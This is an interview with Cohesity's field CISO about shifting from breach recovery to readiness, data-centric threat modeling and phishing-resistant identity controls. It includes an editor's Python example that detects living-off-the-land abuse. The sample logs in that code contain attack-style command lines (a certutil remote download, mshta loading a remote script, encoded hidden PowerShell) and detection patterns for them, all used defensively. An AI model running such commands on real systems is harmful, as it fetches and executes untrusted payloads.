Beyond the breach: Why cybersecurity must shift from recovery to readiness

Field CISO Dale Zabriskie urges organizations to rethink ransomware, redefine risk and empower employees

By Ken Showers, Managing Editor
Updated 2:36 PM CDT, Fri August 15, 2025
PORTLAND, Ore. — The rules for cybersecurity are changing at an alarming rate – so fast that it’s time to throw out the old security playbook and write a new one, according to Dale “Dr. Z” Zabriskie, field CISO at Cohesity.
With decades of experience as a security consultant and tech evangelist, Zabriskie argues that modern cybersecurity should be moving away from the practice of post-breach recovery and focus on real-time damage mitigation. SSN spoke with Zabriskie to learn more about the evolving threat landscape and why established cybersecurity practices need to change to have a place in it.
SSN: You’ve argued that traditional metrics like Recovery Time Objectives (RTOs) are no longer relevant during active breaches. What should security teams prioritize instead when every second counts during an attack? 
Zabriskie: Both RTOs and recovery point objectives (RPOs) focus on “technical recovery,” but cyberattacks aren’t limited to just technical areas of an organization – they affect the entire business, impacting reputation and customer trust. Additionally, when attacks take place, data integrity is often compromised, rendering the backups unusable, thereby delaying restoration.
Security and infrastructure teams need to plan and practice together to ensure they’re ready when the attack strikes. Building strategies for responding to and recovering from cyberattacks shouldn’t be limited to IT and security teams; involvement from legal, PR, compliance and forensic response teams is essential. These parties need to align on what their “minimum viable company” is: If a catastrophic event shuts everything down, what systems would they bring up first? What data, servers, processes, departments, people, etc., does that include? Traditionally, budgets have been based on economic efficiency during “normal times” as opposed to “What will it take for us to be back up and running should an attack occur?”
Security teams need to prioritize getting everyone at the organization on the same page because when the attack occurs, it’s critical to ensure everyone is able to respond and not react.
SSN: You’ve said the term “ransomware” is outdated. How should security leaders shift their threat models to account for attacks that bypass malware entirely, such as pure extortion or data exfiltration?
Zabriskie: I argue that in today’s threat ecosystem, the term “ransomware” is misleading and archaic. Today’s cyberattacks, whether they come with a ransom or not, require an evolving defensive approach. Teams need to shift their focus to data-centric threat modeling, concentrating on data lifecycle and movement and, maybe most importantly, treating their data like it is currency – putting the right controls on the right data. Avoid under- and over-protecting data.
By modeling threats that specifically target the “crown jewels” (data), teams can use zero trust, immutability, air-gapped protection and other approaches to ensure they stay ahead of attackers. Additionally, security leaders should use behavioral analytics to help identify potential “living off the land” techniques (i.e., when cybercriminals use native, legitimate tools within an organization’s own system to sustain and advance an attack).
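As an added illustration of the behavioral-analytics point above, the Python below runs a small set of “living off the land” detection rules over constructed, Sysmon-style process-creation records. This is an editor's example, not part of the interview and not Cohesity's tooling; the hostnames, users, URLs, command lines and the rule set itself are assumptions chosen to show the technique (a legitimate binary flagged only when its command line or its parent process looks wrong), not a complete detection catalog.

```python
import re
from dataclasses import dataclass

# Constructed sample records (key="value" fields). Two are ordinary admin use of
# certutil and powershell; three are classic LOLBin abuse patterns.
SAMPLE_LOG = r'''
host="ws01" user="alice" parent="C:\Windows\explorer.exe" image="C:\Windows\System32\certutil.exe" cmdline="certutil.exe -hashfile C:\Users\alice\setup.exe SHA256"
host="ws02" user="bob" parent="C:\Program Files\Microsoft Office\WINWORD.EXE" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"
host="ws03" user="carol" parent="C:\Windows\System32\cmd.exe" image="C:\Windows\System32\certutil.exe" cmdline="certutil.exe -urlcache -split -f http://files.example.invalid/update.exe update.exe"
host="ws04" user="dave" parent="C:\Windows\explorer.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"
host="ws05" user="erin" parent="C:\Program Files\Microsoft Office\EXCEL.EXE" image="C:\Windows\System32\mshta.exe" cmdline="mshta.exe http://files.example.invalid/invoice.hta"
'''

KV = re.compile(r'(\w+)="([^"]*)"')


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


@dataclass
class Finding:
    host: str
    user: str
    binary: str
    rules: list


# (rule name, binary that must be the image, regex over the command line).
# The binaries are legitimate; only these usages are suspicious. Illustrative set.
RULES = [
    ("certutil_download", "certutil.exe", re.compile(r"-urlcache\b.*\bhttps?://", re.I)),
    ("powershell_encoded", "powershell.exe", re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I)),
    ("mshta_remote", "mshta.exe", re.compile(r"https?://|javascript:|vbscript:", re.I)),
    ("rundll32_script", "rundll32.exe", re.compile(r"javascript:|\bmshtml\b", re.I)),
    ("regsvr32_remote_sct", "regsvr32.exe", re.compile(r"\bscrobj\.dll\b|/i:https?://", re.I)),
    ("bitsadmin_transfer", "bitsadmin.exe", re.compile(r"/transfer\b|/addfile\b", re.I)),
]

# A LOLBin spawned directly by an Office app is a common phishing delivery chain.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_log(text: str) -> list:
    """Parse key="value" records into ProcessEvent objects, skipping malformed lines."""
    events = []
    for line in text.strip().splitlines():
        fields = dict(KV.findall(line))
        if {"host", "user", "parent", "image", "cmdline"} <= fields.keys():
            events.append(ProcessEvent(**fields))
    return events


def evaluate(ev: ProcessEvent):
    """Return a Finding for an event that matches at least one rule, else None."""
    binary = basename(ev.image)
    hits = [name for name, wanted, pat in RULES if binary == wanted and pat.search(ev.cmdline)]
    if hits and basename(ev.parent) in OFFICE_PARENTS:
        hits.append("spawned_by_office")  # escalate: suspicious tool plus suspicious parent
    return Finding(ev.host, ev.user, binary, hits) if hits else None


def detect(events: list) -> list:
    """Run every event through the rules; benign admin use produces no finding."""
    return [f for f in map(evaluate, events) if f is not None]


if __name__ == "__main__":
    for f in detect(parse_log(SAMPLE_LOG)):
        print(f"{f.host} {f.user} {f.binary}: {', '.join(f.rules)}")
```

The two benign records (a hash check and a script run with a file path) pass through untouched, which is the point of behavioral rules over plain binary blocklists: certutil and powershell are not the signal, their command lines and parents are. In production the rules would sit in the SIEM or EDR query language and be tuned against the organization's own baseline, since legitimate software deployment tools can also produce some of these patterns.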
SSN: Given that social engineering has eclipsed malware as the leading attack vector, what immediate changes should organizations make to better secure identities and reduce behavioral vulnerabilities?
Zabriskie: First and foremost, turning the “human” into an asset instead of a liability is an ongoing challenge for any organization. Fostering a security-first culture means employees are trained and engaged in the fight against cybercrime. Employees need to feel empowered to report incidents without fear and receive recognition and rewards for proper, proactive security behavior.
Second, identity access management needs to include phishing-resistant MFA, moving away from SMS and OTP processes. I always ask customers, “How many folks do you have with super administrative privileges to systems?” Then I give them the answer: “Two too many.” Organizations need to regularly reassess access levels and require ongoing justification for each access grant, focusing on the least privileged and just-in-time access. Again, Zero Trust principles are at play here: Security leaders need to continuously verify every access request, look for lateral movement and session hijacking.